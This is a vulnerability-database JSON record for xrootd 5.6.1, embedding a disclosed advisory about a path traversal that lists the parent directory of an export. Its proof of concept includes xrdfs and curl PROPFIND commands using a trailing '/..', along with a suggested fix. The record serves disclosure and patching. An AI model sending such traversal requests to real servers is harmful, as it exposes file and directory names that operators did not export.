{"url":"http://public2.vulnerablecode.io/api/packages/1003126?format=json","purl":"pkg:pypi/xrootd@5.6.1","type":"pypi","namespace":"","name":"xrootd","version":"5.6.1","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"5.9.2","latest_non_vulnerable_version":"5.9.2","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359960?format=json","vulnerability_id":"VCID-daeh-s7gc-4fc9","summary":"xrootd has path traversal in directory listing that allows access to the parent directory via trailing \"..\" pattern\n## Summary\n\nA path traversal vulnerability in XRootD allows users to escape the exported directory scope and enumerate the contents of the parent directory by appending `/..` (specifically without trailing slash) to an exported path in `xrdfs ls` or `HTTP PROPFIND` requests.\n\nThis bypass ignores the `all.export` restriction.\n\n## Affected component\n\n`src/XrdXrootd/XrdXrootdXeq.cc`, and more precisely the functions `rpCheck()` and `Squash()` used in `do_Dirlist()` ([link](https://github.com/xrootd/xrootd/blob/19aa6dee76906fb4d56ded55e49bbe4171ade915/src/XrdXrootd/XrdXrootdXeq.cc#L696)), as they do not check if the path ends with \"..\" (without trailing slash).\nThen the path is passed directly to the filesystem layer.\n\n## PoC\n\n### Configuration\n\n- **Configuration file:** \n```conf\nxrd.port 1094\n\n# Exposing only /alice/\noss.localroot /srv/xrootd/data/\nall.export /alice/\n\n# HTTP\nxrd.protocol http:1094 libXrdHttp.so\n\n# Logs / monitoring\nall.adminpath /var/spool/xrootd\nall.pidpath /var/run/xrootd\n```\n\n- **Filesystem layout on the server:**\n```\n/srv/xrootd/data/\n├── alice/       ← only exported directory\n├── bob/         ← not exported\n└── secret.txt   ← not exported\n```\n\n- **Starting the server:**  `xrootd -c /etc/xrootd/xrootd.cfg` \n\n### Steps to reproduce\n\n**Normal behavior (access outside export is denied):**\n```bash\n$ xrdfs root://<xrootd-server> ls /\n[ERROR] Server responded with an error: [3010] Stating path '/' is disallowed.\n```\n\n**Bypass via trailing `..`:**\n```bash\n$ xrdfs root://<xrootd-server>ls /alice/..\n/alice/../alice\n/alice/../bob\n/alice/../secret.txt\n```\n \n**Also exploitable via HTTP PROPFIND:**\n\n```bash\ncurl -X PROPFIND 'http://<xrootd-server>:1094/alice/..' \\\n  --path-as-is \\\n  -H \"Depth: 1\"\n```\nReturns HTTP 200 with full listing of the parent directory, including unexported entries (`bob/`, `secret.txt`).\n\n**However, file download via this path traversal is blocked:**\n```bash\n$ xrdcp root://<xrootd-server>/alice/../secret.txt .\n[0B/0B][100%][==================================================][0B/s]  \nRun: [ERROR] Server responded with an error: [3010] Opening relative path 'alice/../secret.txt' is disallowed. (source)\n```\n\n## Impact\nAn attacker can enumerate directories and filenames outside the authorized export scope defined by `all.export`. In the example above, a server exporting only `/alice/` leaks the existence of `/bob/` and `secret.txt` located in the parent directory (`oss.localroot`).\n\nFile download is not possible through this vector, as `xrdcp` correctly rejects the path with error 3010. The impact seems therefore limited to **information disclosure** (directory and filename enumeration).\n\nThis vulnerability could affect all XRootD deployments regardless of authentication configuration, as it bypasses the export path restriction itself.\n\n## Suggested fix\n\nIn `rpCheck()` (`src/XrdXrootd/XrdXrootdXeq.cc`), change:\n```cpp\n// Before\nif (fn[0] == '.' && fn[1] == '.' && fn[2] == '/') return 1;\n\n// After\nif (fn[0] == '.' && fn[1] == '.' && (fn[2] == '/' || fn[2] == '\\0')) return 1;\n```","references":[{"reference_url":"http://github.com/xrootd/xrootd/releases/tag/v5.9.2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://github.com/xrootd/xrootd/releases/tag/v5.9.2"},{"reference_url":"https://github.com/xrootd/xrootd","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/xrootd/xrootd"},{"reference_url":"https://github.com/xrootd/xrootd/commit/45efac7267a115ca4f2102214498e8cb011eb69b","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/xrootd/xrootd/commit/45efac7267a115ca4f2102214498e8cb011eb69b"},{"reference_url":"https://github.com/xrootd/xrootd/security/advisories/GHSA-vj8v-p5vw-m6v5","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/xrootd/xrootd/security/advisories/GHSA-vj8v-p5vw-m6v5"},{"reference_url":"https://github.com/advisories/GHSA-vj8v-p5vw-m6v5","reference_id":"GHSA-vj8v-p5vw-m6v5","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-vj8v-p5vw-m6v5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/374234?format=json","purl":"pkg:pypi/xrootd@5.9.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/xrootd@5.9.2"}],"aliases":["GHSA-vj8v-p5vw-m6v5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-daeh-s7gc-4fc9"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/xrootd@5.6.1"}